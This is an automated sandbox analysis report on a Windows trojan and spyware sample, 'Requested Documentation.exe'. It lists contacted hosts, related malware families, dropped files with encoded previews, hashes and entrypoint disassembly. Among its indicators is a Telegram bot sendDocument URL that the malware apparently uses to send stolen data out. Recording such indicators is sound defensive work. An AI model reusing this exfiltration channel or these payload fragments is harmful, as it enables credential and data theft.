                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRegSvcs.exe, 00000001.00000002.4194140589.00000000030C9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://api.telegram.org/bot-/sendDocument?chat_id=RegSvcs.exe, 00000001.00000002.4195976389.00000000056C0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4195549019.0000000004061000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4193632082.0000000002D70000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4195898548.0000000005680000.00000004.08000000.00040000.00000000.sdmpfalse
                                                      		high
                                                      https://reallyfreegeoip.org/xml/RegSvcs.exe, 00000001.00000002.4195976389.00000000056C0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4195549019.0000000004061000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4193632082.0000000002D70000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4194140589.000000000314C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4195898548.0000000005680000.00000004.08000000.00040000.00000000.sdmpfalse
                                                        		high

                                                        World Map of Contacted IPs

                                                        • No. of IPs < 25%
                                                        • 25% < No. of IPs < 50%
                                                        • 50% < No. of IPs < 75%
                                                        • 75% < No. of IPs

                                                        Public IPs

                                                        IPDomainCountryFlagASNASN NameMalicious
                                                        149.154.167.220
                                                        		api.telegram.orgUnited Kingdom
                                                        		62041TELEGRAMRUfalse
                                                        188.114.96.3
                                                        		reallyfreegeoip.orgEuropean Union
                                                        		13335CLOUDFLARENETUSfalse
                                                        132.226.247.73
                                                        		checkip.dyndns.comUnited States
                                                        		16989UTMEMUSfalse

                                                        General Information

                                                        Joe Sandbox version:41.0.0 Charoite
                                                        Analysis ID:1582315
                                                        Start date and time:2024-12-30 10:56:04 +01:00
                                                        Joe Sandbox product:CloudBasic
                                                        Overall analysis duration:0h 9m 10s
                                                        Hypervisor based Inspection enabled:false
                                                        Report type:full
                                                        Cookbook file name:default.jbs
                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                        Number of analysed new started processes analysed:6
                                                        Number of new started drivers analysed:0
                                                        Number of existing processes analysed:0
                                                        Number of existing drivers analysed:0
                                                        Number of injected processes analysed:0
                                                        Technologies:
                                                        • HCA enabled
                                                        • EGA enabled
                                                        • AMSI enabled
                                                        Analysis Mode:default
                                                        Analysis stop reason:Timeout
                                                        Sample name:Requested Documentation.exe
                                                        Detection:MAL
                                                        Classification:mal100.troj.spyw.evad.winEXE@3/4@3/3
                                                        EGA Information:
                                                        • Successful, ratio: 100%
                                                        HCA Information:
                                                        • Successful, ratio: 98%
                                                        • Number of executed functions: 58
                                                        • Number of non-executed functions: 271
                                                        Cookbook Comments:
                                                        • Found application associated with file extension: .exe
                                                        • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                        Warnings

                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                        • Excluded IPs from analysis (whitelisted): 20.109.210.53, 13.107.246.45
                                                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                        • Not all processes where analyzed, report is missing behavior information
                                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                        • Report size getting too big, too many NtQueryValueKey calls found.

                                                        Simulations

                                                        Behavior and APIs

                                                        TimeTypeDescription
                                                        04:57:09API Interceptor10586606x Sleep call for process: RegSvcs.exe modified

                                                        Joe Sandbox View / Context

                                                        IPs

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        149.154.167.220iviewers.dllGet hashmaliciousLummaCBrowse
                                                          Flasher.exeGet hashmaliciousLuca Stealer, Rusty StealerBrowse
                                                            i8Vwc7iOaG.exeGet hashmaliciousLummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, StormKitty, VidarBrowse
                                                              INQUIRY.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                cMTqzvmx9u.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RedLineBrowse
                                                                  Technonomic.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                    Proforma Invoice.exeGet hashmaliciousMassLogger RATBrowse
                                                                      Azygoses125.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                        tg.exeGet hashmaliciousBabadedaBrowse
                                                                          tg.exeGet hashmaliciousBabadedaBrowse
                                                                            188.114.96.3QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                            • filetransfer.io/data-package/u7ghXEYp/download
                                                                            CV_ Filipa Barbosa.exeGet hashmaliciousFormBookBrowse
                                                                            • www.mffnow.info/1a34/
                                                                            A2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                                            • www.mydreamdeal.click/1ag2/
                                                                            SWIFT COPY 0028_pdf.exeGet hashmaliciousFormBookBrowse
                                                                            • www.questmatch.pro/ipd6/
                                                                            QUOTATION_NOVQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                            • filetransfer.io/data-package/I7fmQg9d/download
                                                                            need quotations.exeGet hashmaliciousFormBookBrowse
                                                                            • www.rtpwslot888gol.sbs/jmkz/
                                                                            QUOTATION_NOVQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                            • filetransfer.io/data-package/Bh1Kj4RD/download
                                                                            http://kklk16.bsyo45ksda.topGet hashmaliciousUnknownBrowse
                                                                            • kklk16.bsyo45ksda.top/favicon.ico
                                                                            QUOTATION_NOVQTRA071244#U00faPDF.scr.exeGet hashmaliciousUnknownBrowse
                                                                            • filetransfer.io/data-package/XrlEIxYp/download
                                                                            QUOTATION_NOVQTRA071244#U00faPDF.scr.exeGet hashmaliciousUnknownBrowse
                                                                            • filetransfer.io/data-package/XrlEIxYp/download
                                                                            132.226.247.73Dotc67890990.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                            • checkip.dyndns.org/
                                                                            Invoice DHL - AWB 2024 E4001 - 0000731.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                            • checkip.dyndns.org/
                                                                            PURCHASE ORDER TRC-090971819130-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                            • checkip.dyndns.org/
                                                                            D.G Governor Istek,Docx.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                                            • checkip.dyndns.org/
                                                                            0001.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                            • checkip.dyndns.org/
                                                                            Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • checkip.dyndns.org/
                                                                            ugpJX5h56S.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                            • checkip.dyndns.org/
                                                                            hesaphareketi-01.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                            • checkip.dyndns.org/
                                                                            Shipment 990847575203.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • checkip.dyndns.org/
                                                                            DEC 2024 RFQ.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • checkip.dyndns.org/

                                                                            Domains

                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            reallyfreegeoip.orgDotc67890990.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                            • 104.21.67.152
                                                                            INQUIRY.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                            • 172.67.177.134
                                                                            Technonomic.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                            • 172.67.177.134
                                                                            HALKBANK EKSTRE.exeGet hashmaliciousMassLogger RATBrowse
                                                                            • 172.67.177.134
                                                                            EPIRTURMEROOO0060.exeGet hashmaliciousMassLogger RATBrowse
                                                                            • 172.67.177.134
                                                                            Proforma Invoice.exeGet hashmaliciousMassLogger RATBrowse
                                                                            • 104.21.67.152
                                                                            Azygoses125.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                            • 104.21.67.152
                                                                            HUBED342024.exeGet hashmaliciousMassLogger RATBrowse
                                                                            • 172.67.177.134
                                                                            PARATRANSFARI REMINDER.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                            • 104.21.67.152
                                                                            MT Eagle Asia 11.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                            • 104.21.67.152
                                                                            checkip.dyndns.comZOYGRL1ePa.exeGet hashmaliciousAgent Tesla, AgentTeslaBrowse
                                                                            • 158.101.44.242
                                                                            Dotc67890990.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                            • 132.226.247.73
                                                                            INQUIRY.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                            • 193.122.6.168
                                                                            Technonomic.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                            • 193.122.6.168
                                                                            HALKBANK EKSTRE.exeGet hashmaliciousMassLogger RATBrowse
                                                                            • 193.122.6.168
                                                                            EPIRTURMEROOO0060.exeGet hashmaliciousMassLogger RATBrowse
                                                                            • 193.122.6.168
                                                                            Proforma Invoice.exeGet hashmaliciousMassLogger RATBrowse
                                                                            • 193.122.6.168
                                                                            Azygoses125.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                            • 132.226.8.169
                                                                            HUBED342024.exeGet hashmaliciousMassLogger RATBrowse
                                                                            • 193.122.6.168
                                                                            PARATRANSFARI REMINDER.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                            • 132.226.8.169
                                                                            api.telegram.orgiviewers.dllGet hashmaliciousLummaCBrowse
                                                                            • 149.154.167.220
                                                                            Flasher.exeGet hashmaliciousLuca Stealer, Rusty StealerBrowse
                                                                            • 149.154.167.220
                                                                            INQUIRY.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                            • 149.154.167.220
                                                                            Technonomic.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                            • 149.154.167.220
                                                                            Proforma Invoice.exeGet hashmaliciousMassLogger RATBrowse
                                                                            • 149.154.167.220
                                                                            Azygoses125.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                            • 149.154.167.220
                                                                            tg.exeGet hashmaliciousBabadedaBrowse
                                                                            • 149.154.167.220
                                                                            tg.exeGet hashmaliciousBabadedaBrowse
                                                                            • 149.154.167.220
                                                                            setup.exeGet hashmaliciousBabadedaBrowse
                                                                            • 149.154.167.220
                                                                            file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                            • 149.154.167.220

                                                                            ASNs

                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            TELEGRAMRUTool_Unlock_v1.2.exeGet hashmaliciousVidarBrowse
                                                                            • 149.154.167.99
                                                                            iviewers.dllGet hashmaliciousLummaCBrowse
                                                                            • 149.154.167.220
                                                                            Flasher.exeGet hashmaliciousLuca Stealer, Rusty StealerBrowse
                                                                            • 149.154.167.220
                                                                            JA7cOAGHym.exeGet hashmaliciousVidarBrowse
                                                                            • 149.154.167.99
                                                                            https://linkenbio.net/59125/247Get hashmaliciousUnknownBrowse
                                                                            • 149.154.167.99
                                                                            aD7D9fkpII.exeGet hashmaliciousVidarBrowse
                                                                            • 149.154.167.99
                                                                            installer.batGet hashmaliciousVidarBrowse
                                                                            • 149.154.167.99
                                                                            skript.batGet hashmaliciousVidarBrowse
                                                                            • 149.154.167.99
                                                                            din.exeGet hashmaliciousVidarBrowse
                                                                            • 149.154.167.99
                                                                            yoda.exeGet hashmaliciousVidarBrowse
                                                                            • 149.154.167.99
                                                                            CLOUDFLARENETUS6QLvb9i.exeGet hashmaliciousLummaCBrowse
                                                                            • 188.114.97.3
                                                                            http://i646972656374o6c6373o636f6dz.oszar.com/Get hashmaliciousUnknownBrowse
                                                                            • 104.16.79.73
                                                                            securedoc_20241220T111852.htmlGet hashmaliciousUnknownBrowse
                                                                            • 104.17.25.14
                                                                            https://visa-pwr.com/Get hashmaliciousUnknownBrowse
                                                                            • 104.18.28.104
                                                                            lumma.ps1Get hashmaliciousLummaCBrowse
                                                                            • 104.21.72.190
                                                                            vlid_acid.exeGet hashmaliciousLummaC StealerBrowse
                                                                            • 172.67.190.223
                                                                            sysmonconfig.xmlGet hashmaliciousUnknownBrowse
                                                                            • 172.64.41.3
                                                                            https://N0.kolivane.ru/da4scmQ/#Memily.gamble@amd.comGet hashmaliciousUnknownBrowse
                                                                            • 172.67.134.110
                                                                            https://smex-ctp.trendmicro.com/wis/clicktime/v1/query?url=https%3a%2f%2fshm.to%2fpolice&umid=0d23e2e5-f76c-4734-8c53-52692e5df704&auth=771bc9afedacaf21ff6267a075d4e92f38a56cd1-76eb9d39a6a3c5ec361f1d32692c8a467e476d6aGet hashmaliciousUnknownBrowse
                                                                            • 104.18.1.101
                                                                            UTMEMUSDotc67890990.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                            • 132.226.247.73
                                                                            Azygoses125.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                            • 132.226.8.169
                                                                            PARATRANSFARI REMINDER.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                            • 132.226.8.169
                                                                            Invoice DHL - AWB 2024 E4001 - 0000731.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                            • 132.226.247.73
                                                                            PURCHASE ORDER TRC-090971819130-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                            • 132.226.247.73
                                                                            F.O Pump Istek,Docx.batGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                                            • 132.226.8.169
                                                                            D.G Governor Istek,Docx.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                                            • 132.226.247.73
                                                                            0001.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                            • 132.226.247.73
                                                                            Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • 132.226.247.73
                                                                            sparc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                            • 132.240.253.211

                                                                            JA3 Fingerprints

                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            54328bd36c14bd82ddaa0c04b25ed9adDotc67890990.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                            • 188.114.96.3
                                                                            INQUIRY.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                            • 188.114.96.3
                                                                            Technonomic.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                            • 188.114.96.3
                                                                            HALKBANK EKSTRE.exeGet hashmaliciousMassLogger RATBrowse
                                                                            • 188.114.96.3
                                                                            EPIRTURMEROOO0060.exeGet hashmaliciousMassLogger RATBrowse
                                                                            • 188.114.96.3
                                                                            Proforma Invoice.exeGet hashmaliciousMassLogger RATBrowse
                                                                            • 188.114.96.3
                                                                            Azygoses125.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                            • 188.114.96.3
                                                                            HUBED342024.exeGet hashmaliciousMassLogger RATBrowse
                                                                            • 188.114.96.3
                                                                            PARATRANSFARI REMINDER.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                            • 188.114.96.3
                                                                            MT Eagle Asia 11.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                            • 188.114.96.3
                                                                            3b5074b1b5d032e5620f69f9f700ff0elumma.ps1Get hashmaliciousLummaCBrowse
                                                                            • 149.154.167.220
                                                                            GPU-Z.exeGet hashmaliciousLummaC, DarkTortilla, LummaC StealerBrowse
                                                                            • 149.154.167.220
                                                                            Winter.mp4.htaGet hashmaliciousLummaCBrowse
                                                                            • 149.154.167.220
                                                                            aYu936prD4.exeGet hashmaliciousUnknownBrowse
                                                                            • 149.154.167.220
                                                                            aYu936prD4.exeGet hashmaliciousUnknownBrowse
                                                                            • 149.154.167.220
                                                                            VegaStealer_v2.exeGet hashmaliciousAdes Stealer, BlackGuard, NitroStealer, VEGA StealerBrowse
                                                                            • 149.154.167.220
                                                                            SharcHack.exeGet hashmaliciousAdes Stealer, BlackGuard, NitroStealer, VEGA Stealer, XmrigBrowse
                                                                            • 149.154.167.220
                                                                            l0zocrLiVW.exeGet hashmaliciousLummaCBrowse
                                                                            • 149.154.167.220
                                                                            FLKCAS1DzH.batGet hashmaliciousUnknownBrowse
                                                                            • 149.154.167.220

                                                                            Dropped Files

                                                                            No context

                                                                            Created / dropped Files

                                                                            C:\Users\user\AppData\Local\Temp\Laddonia

                                                                            Download File
                                                                            Process:C:\Users\user\Desktop\Requested Documentation.exe
                                                                            File Type:ASCII text, with very long lines (28674), with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):28674
                                                                            Entropy (8bit):3.576516521383417
                                                                            Encrypted:false
                                                                            SSDEEP:768:G3i/5IPbFVvkb7Ogotwp5JF6xVLmql1ffnu1uLphM:UiBIPb7o7OZ2uLDM
                                                                            MD5:9A59BBDD886F68C7BE07A029ED4D3E80
                                                                            SHA1:1BE16BF41496F0DA17429EAF7D29B4868AAB5322
                                                                            SHA-256:E003FCAB09F68F411C333E06368E3108738248D939BBE508A3B16606462AC3FC
                                                                            SHA-512:85C679487ABD4E79AC76872260E267BAE4C04F392E7EBE43835C493E3EDAD7D3B8C0914BF0A2D9D505AAB1A2B0ADD3D45CE990AAE81388A3054501665CEFC37A
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview:x055b8ce18cecc20000065758bb6000000669854489b560000006698d468ab27000000669855888be6000000669854a89b560000006698d4c8abc6000000669855e88b33000000669854099b230000006698d429abe2000000669855498b46000000669854699bc60000006698d489abc6000000669855a9330c669854c99be60000006698d844ffffffab4700000066985964ffffff8b4600000066985884ffffff9bc60000006698d8a4ffffffabc6000000669859c4ffffff8be2000000669858e4ffffff9b460000006698d805ffffffabc600000066985925ffffff8bc600000066985845ffffff339c6698d865ffffffab570000006698550d8b370000006698542d9b560000006698d44dab270000006698556d8b330000006698548d9b230000006698d4adabe2000000669855cd8b46000000669854ed9bc60000006698d40eabc60000006698552e330c6698544e9b160000006698d886ffffffab46000000669859a6ffffff8b67000000669858c6ffffff9b160000006698d8e6ffffffab0700000066985907ffffff8b9600000066985827ffffff9b330000006698d847ffffffab2300000066985967ffffff8be200000066985887ffffff9b460000006698d8a7ffffffabc6000000669859c7ffffff8bc6000000669858e7ffffff339c6698d408ab370000006698550a8b86

                                                                            C:\Users\user\AppData\Local\Temp\aut9709.tmp

                                                                            Download File
                                                                            Process:C:\Users\user\Desktop\Requested Documentation.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):202438
                                                                            Entropy (8bit):7.986069339726158
                                                                            Encrypted:false
                                                                            SSDEEP:6144:o7siyfGmEvnb98JhcjvTQVTAHI8yAKgO2S:oIiSGXvbmPcnY0HI/AKB
                                                                            MD5:745A16F13262FAA0919D175F5023126E
                                                                            SHA1:B45F441BBC4ED36A01CD137EA44DFE7FD34495B5
                                                                            SHA-256:5DA9E93F7C8B868A62DFB54D5C4D1C8BB76081A16F2035BB8883EF9F28A71F25
                                                                            SHA-512:8D132D1EED596363202CBFE6018A9E5E775C233B271D07344039379065D83AFE0140C429AAC709F4A8C460CD26191BE84842811569B40AE04563E2C7CC009E59
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview:EA06..2...;.:..I..j.n>.aG...ju..5.Ri .D.0..@..X...7..EzS..L>t....O..b....}p.R..y..oh...j..+.\(..$B]/.C/1...<.Y....p.#2j.r1t.h.w.?Ji..j...{g.l../.......6.^....l.v.T.gL.$ VID..G.OmQi...<.R-R:...+.R.(.?.2w...c0....K.Q..E...[..n.;.R+T.u>.X..@.......l.:..!...$.....Z..~f......mN..&.;...R.N9S.=F.H...4.M&..I....|.9.*.....<D.....|>...P.....~...*..%..Fm....}.j..c=..$....;`..4...Mk..<.iW.J.......2p.CU9.~..C..Z]Q.....u..H......AM..?|..T..o.N...#.X.Sj.i.*aU.V..j`.....R..._h......[&V:mbe..dd..o.A0.hk...:....c;j.C.y..1x......?9L......?W.?.56.Z..y.b.I......q...c....l_k..p..G.pz._.).Q.y......<&3.5:....4/4.o..Q0.......JN._.Qp.j.W....o...'.4....~.}...'....1J..5.nE&....9;..cm.......)..@(....6.Kt...['..6`...F ....%G..^K..=q.ZhW....n.k(]x...\...[...s..E,..-...V&..M......>>6.KH.s.U..g..D.P.......@...>.i...4........s.UN....:1I."a.V......[j8..JWJ..?.....-..&...B.>.],v../{..............O....ta....uZ.....$V....>..N....}0.._.m@...i......a{]...J.......aA.t....b..D.T.v..I..{.(5.

                                                                            C:\Users\user\AppData\Local\Temp\aut9758.tmp

                                                                            Download File
                                                                            Process:C:\Users\user\Desktop\Requested Documentation.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):9642
                                                                            Entropy (8bit):7.605185944277541
                                                                            Encrypted:false
                                                                            SSDEEP:192:c09SJLZ7jNO7shMZLo2rfGUBd1fbLeZxMGSbpk5jHIdy41oZ/Fboa6VNyAtStJMS:X9SJtjMM2Tl1fOcIhHIcdJ6VY3MivYLi
                                                                            MD5:EBEC6F71418CD94F4B2AC503AAEA600D
                                                                            SHA1:11CC89821DCC70A4ED40248F35C2E93CC31FE0CE
                                                                            SHA-256:62169D919AFC3F4FB472B462823F974029BBBF31E120F6D0A6BD62535826E59B
                                                                            SHA-512:F0830799D605354D05D92E381B9AC07DEB31B0EA3C9F506706877D8394E82B631C3C5A03C4C15ED19A860ED46CF3F71E421C882FC829476C5591A7A5B309AB6A
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview:EA06..p..L&.[...e....;..`....y...b.......s8..&...j.%.$.m8..Sp.N.g.....m.X@..K...c.$....lL.`..Ng6)...l.I...b....4..,S@..l.l.-z..f.6|v...Qc.0.......q4.Y..k..h......c ._..p.1....qa.H....9..$l.3..Y@.6...$.a5.H.f@.....|3....fs9..%d.M...5...&.@.@.K.I.....Y.x>9.....Y.j.;.......j.;-....Y@j.9.....K,..1...'.`....|.....,S`..N,`...H.......|....F. ,_...c3..........;..:&.>_L.n....f.G_T......|.).......&.....8...&V....ia...=.....Y......&..`.l..|.[.....Yl ....ab...,@....ib........h.._..@...3|.P.o.ac.....+.....N.i|sk....8..4|.0...c....7....k ..7.X..TD....M&`....g....,,`....>.Y...$.@&....L&.P.....32.|&.G%......h...,..33.%.....BS...Nf......f.4.L,.9."....Bvp.Y...ffS{$..d..,.@8@.......@.3d.L..k4.h..M.B:.Y...fg6.;.ab....98.L..:.....of.L.*..Fp........36.Y&.k,.b...' !...,t.33.4.c2.X.M....#......j.d...[..%3.....c....M'6...ic....!..,..3 k..p....@...L&..........., ....#......f.8.X..K..`....zn........0{.k7....!..,...S.%..9..J@^@.G'.......aa.M..)LM@B:.Y...ffS...r....@...N@.:.....n..Mf@....

                                                                            C:\Users\user\AppData\Local\Temp\fondaco

                                                                            Download File
                                                                            Process:C:\Users\user\Desktop\Requested Documentation.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):209408
                                                                            Entropy (8bit):7.835973097555397
                                                                            Encrypted:false
                                                                            SSDEEP:6144:Y5pZIM9aQEkzOO1VOWiZYbxsTPl1L6KUGUXHD/:6IWaR8n1VO2b4PP+K6HD/
                                                                            MD5:F3198D88969F91AAE1424785247EBB9B
                                                                            SHA1:902195B32F662BC3F2370C3B1748DA8FDF850C2B
                                                                            SHA-256:56122AD9D4E3C93866C48FBBB7E231596336F203EE0F85BAFDE235E88D2A69C7
                                                                            SHA-512:37E623AABC26B2BA131CF6A56029BF44C228958E508850EDD9A831AD4AB0BED3B06A4F0CDAB31D5515A02248FC99337C296FF3FA4EDCB81DE752D2015A714BE6
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview:.l.C[5XIMMP6.0G.ZH6NCX5.IIMP68J0GAZH6NCX5XIIMP68J0GAZH6NCX5.IIM^).D0.H.i.O....! >pFJ%W5 7hU/-6Z,i+(pDM$../z.y.c5Z<,g@]<.J0GAZH6&S..t8.3|G.4.6.$z.1=gD.7B..H.;.9m+.H.2.Kjj'3LG.4.d($.G.=j.#7d<.Hj#S/m+.HNCX5XIIMP68J0GAZ..;.X5XI..P6tK4G5.HfNCX5XIIM.6.K;FHZH.OCX.YIIMP6..0GAJH6N.Y5XI.MP&8J0EAZM6NCX5XILMP68J0GA.K6NGX5.rKMR68.0GQZH&NCX5HII]P68J0GQZH6NCX5XIIM.#:J`GAZHVLC.$YIIMP68J0GAZH6NCX5XIIMP68J..@ZT6NCX5XIIMP68J0GAZH6NCX5XIIM.;:JpGAZH6NCX5XII.Q6.K0GAZH6NCX5XIIMP68J0GAZH6NCvA=1=MP6 .1GAJH6N.Y5XMIMP68J0GAZH6NCx5X)g?4WL+0G.7H6N.Y5X'IMP.9J0GAZH6NCX5XI.MPv..Q3 ZH6.sX5XiKMP 8J0MCZH6NCX5XIIMP6xJ0.o(;D-CX5.XHMPV:J0U@ZH.LCX5XIIMP68J0G.ZHvNCX5XIIMP68J0GAZH6NCX5XIIMP68J0GAZH6NCX5XIIMP68J0GAZH6NCX5XIIMP68J0GAZH6NCX5XIIMP68J0GAZH6NCX5XIIMP68J0GAZH6NCX5XIIMP68J0GAZH6NCX5XIIMP68J0GAZH6NCX5XIIMP68J0GAZH6NCX5XIIMP68J0GAZH6NCX5XIIMP68J0GAZH6NCX5XIIMP68J0GAZH6NCX5XIIMP68J0GAZH6NCX5XIIMP68J0GAZH6NCX5XIIMP68J0GAZH6NCX5XIIMP68J0GAZH6NCX5XIIMP68J0GAZH6NCX5XIIMP68J0GAZH6NCX5XIIMP68J0GAZH6NCX5XIIMP68J0GAZH6NCX5XIIM

                                                                            Static File Info

                                                                            General

                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                            Entropy (8bit):7.048139892373215
                                                                            TrID:
                                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                            File name:Requested Documentation.exe
                                                                            File size:1'090'048 bytes
                                                                            MD5:7ccc5d635cbd8627f4f2aac3e54248d0
                                                                            SHA1:cc315dfc181424321b7e82bb19bab2d949346aa3
                                                                            SHA256:bbe22c9c5c417bd5f92f310e994ed7b0ea3323feabc7d16eb14d25b84059d38d
                                                                            SHA512:85cf0e71d96265a838ae581e8dc08cfe078305dcd3bc2b660d51d1ace657b46432cc0a7066c03e2c6183505506fdfc105bc4846f7d960555f5ca99f9b0b57d87
                                                                            SSDEEP:24576:Ou6J33O0c+JY5UZ+XC0kGso6FaHFJolYKA9pWY:Au0c++OCvkGs9FaHfolYKAuY
                                                                            TLSH:0D35BE2273DDC370CB669173BF6AB7016EBF7C610630B85B2F980D79A950162162D7A3
                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.

                                                                            File Icon

                                                                            Icon Hash:aaf3e3e3938382a0

                                                                            Static PE Info

                                                                            General

                                                                            Entrypoint:0x427dcd
                                                                            Entrypoint Section:.text
                                                                            Digitally signed:false
                                                                            Imagebase:0x400000
                                                                            Subsystem:windows gui
                                                                            Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                            DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                            Time Stamp:0x6771E02A [Sun Dec 29 23:50:02 2024 UTC]
                                                                            TLS Callbacks:
                                                                            CLR (.Net) Version:
                                                                            OS Version Major:5
                                                                            OS Version Minor:1
                                                                            File Version Major:5
                                                                            File Version Minor:1
                                                                            Subsystem Version Major:5
                                                                            Subsystem Version Minor:1
                                                                            Import Hash:afcdf79be1557326c854b6e20cb900a7

                                                                            Entrypoint Preview

                                                                            Instruction
                                                                            call 00007FF940C32CFAh
                                                                            jmp 00007FF940C25AC4h
                                                                            int3
                                                                            int3
                                                                            int3
                                                                            int3
                                                                            int3
                                                                            int3
                                                                            int3
                                                                            int3
                                                                            int3
                                                                            push edi
                                                                            push esi
                                                                            mov esi, dword ptr [esp+10h]
                                                                            mov ecx, dword ptr [esp+14h]
                                                                            mov edi, dword ptr [esp+0Ch]
                                                                            mov eax, ecx
                                                                            mov edx, ecx
                                                                            add eax, esi
                                                                            cmp edi, esi
                                                                            jbe 00007FF940C25C4Ah
                                                                            cmp edi, eax
                                                                            jc 00007FF940C25FAEh
                                                                            bt dword ptr [004C31FCh], 01h
                                                                            jnc 00007FF940C25C49h
                                                                            rep movsb
                                                                            jmp 00007FF940C25F5Ch
                                                                            cmp ecx, 00000080h
                                                                            jc 00007FF940C25E14h
